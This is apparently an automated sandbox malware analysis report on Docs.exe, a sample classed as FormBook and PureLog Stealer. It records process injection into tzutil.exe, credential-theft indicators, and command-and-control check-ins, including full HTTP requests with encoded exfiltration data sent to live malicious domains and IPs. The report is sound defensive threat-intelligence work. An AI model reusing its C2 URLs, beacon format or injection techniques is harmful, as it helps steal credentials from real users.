
Windows Analysis Report
Docs.exe

Overview

General Information

Sample name: Docs.exe
Analysis ID: 1564721
MD5: db3260038649d2048d4d203b210c42ad
SHA1: 5057a1fd64ddcf3ecc104558972db366a062f6ca
SHA256: a0d68da288f42150fd44bda2ead2c51e139e25b518a932e8071818af802107b3

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Docs.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\Docs.exe" MD5: DB3260038649D2048D4D203B210C42AD)
    • Docs.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\Docs.exe" MD5: DB3260038649D2048D4D203B210C42AD)
      • hrhhgLQrQIpiVv.exe (PID: 1856 cmdline: "C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 4148 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • hrhhgLQrQIpiVv.exe (PID: 1268 cmdline: "C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
0.2.Docs.exe.3ae24c8.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.Docs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.Docs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.Docs.exe.7030000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Docs.exe.3ae24c8.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
                      No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:29:39.701273+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49735 | 161.97.142.144 | 80 | TCP
2024-11-28T18:30:05.449809+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49739 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:21.433517+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 18.139.62.226 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:29:39.701273+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 161.97.142.144 | 80 | TCP
2024-11-28T18:30:05.449809+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:21.433517+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 18.139.62.226 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:29:57.349629+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:00.021193+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:02.697212+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:13.333737+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:15.990010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:18.646422+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:37.089228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 209.74.77.107 | 80 | TCP


                      AV Detection

Source: http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp | Avira URL Cloud: Label: malware
Source: http://www.taxiquynhonnew.click/y49d/ | Avira URL Cloud: Label: malware
Source: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | Avira URL Cloud: Label: malware
Source: Docs.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Docs.exe | Joe Sandbox ML: detected
Source: Docs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Docs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: owNk.pdbSHA256k source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdbGCTL source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hrhhgLQrQIpiVv.exe, 00000006.00000002.3287825092.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3287843447.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Docs.exe, Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: owNk.pdb source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdb source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 7_2_0321C9D0 FindFirstFileW,FindNextFileW,FindClose, 7_2_0321C9D0
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then xor eax, eax 7_2_03209F80
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then mov ebx, 00000004h 7_2_03CD04D0

                      Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49735 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49735 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49739 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49739 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49743 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49743 -> 18.139.62.226:80
                      Source: DNS query: www.070001325.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | IP Address: 18.139.62.226
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.070001325.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /2gcl/?rvEtL=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmadCojy5vYT1OBl+VDfuWeAsbdd6UgJfU04VHRics3erVRA==&mFTD=mPHXHp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.expancz.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.taxiquynhonnew.click | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.070001325.xyz
Source: global traffic | DNS traffic detected: DNS query: www.expancz.top
Source: global traffic | DNS traffic detected: DNS query: www.taxiquynhonnew.click
Source: global traffic | DNS traffic detected: DNS query: www.epitomize.shop
Source: global traffic | DNS traffic detected: DNS query: www.learnwithus.site
Source: unknown | HTTP traffic detected: POST /2gcl/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.expancz.top | Origin: http://www.expancz.top | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 206 | Cache-Control: max-age=0 | Referer: http://www.expancz.top/2gcl/ | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 | Data Ascii: rvEtL=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSz1zdw/T/6dY+55Vn7TogDre3OQZZi1tgvUoDT0=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 28 Nov 2024 17:29:39 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 2966 | Connection: close | Vary: Accept-Encoding | ETag: "66cce1df-b96"
Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.taxiquynhonnew.click
Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.taxiquynhonnew.click/y49d/
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live
Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: tzutil.exe, 00000007.00000002.3288094917.000000000355B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: tzutil.exe, 00000007.00000002.3288094917.000000000355B000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: tzutil.exe, 00000007.00000003.2775659259.00000000082B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://s.yimg.com/wi/ytc.js
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: tzutil.exe, 00000007.00000002.3290025914.0000000004768000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.00000000034A8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM

                      E-Banking Fraud

Source: Yara match | File source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_0042C953 NtClose
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2B60 NtClose, LdrInitializeThunk
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2DF0 NtQuerySystemInformation, LdrInitializeThunk
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2C70 NtFreeVirtualMemory, LdrInitializeThunk
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E35C0 NtCreateMutant, LdrInitializeThunk
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E4340 NtSetContextThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E4650 NtSuspendThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2BF0 NtAllocateVirtualMemory
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2BE0 NtQueryValueKey
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2B80 NtQueryInformationFile
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2BA0 NtEnumerateValueKey
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2AD0 NtReadFile
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2AF0 NtWriteFile
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2AB0 NtWaitForSingleObject
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2D10 NtMapViewOfSection
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2D00 NtSetInformationFile
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2D30 NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2DD0 NtDelayExecution
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2DB0 NtEnumerateKey
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2C60 NtCreateKey
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2C00 NtQueryInformationProcess
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2CC0 NtQueryVirtualMemory
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2CF0 NtOpenProcess
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2CA0 NtQueryInformationToken
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2F60 NtCreateProcessEx
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2F30 NtCreateSection
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2FE0 NtCreateFile
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2F90 NtProtectVirtualMemory
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2FB0 NtResumeThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2FA0 NtQuerySection
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2E30 NtWriteVirtualMemory
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2EE0 NtQueueApcThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2E80 NtReadVirtualMemory
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E2EA0 NtAdjustPrivilegesToken
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E3010 NtOpenDirectoryObject
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E3090 NtSetValueKey
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E39B0 NtGetContextThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E3D70 NtOpenThread
                      Source: C:\Users\user\Desktop\Docs.exe, Code function: 3_2_015E3D10 NtOpenProcessToken
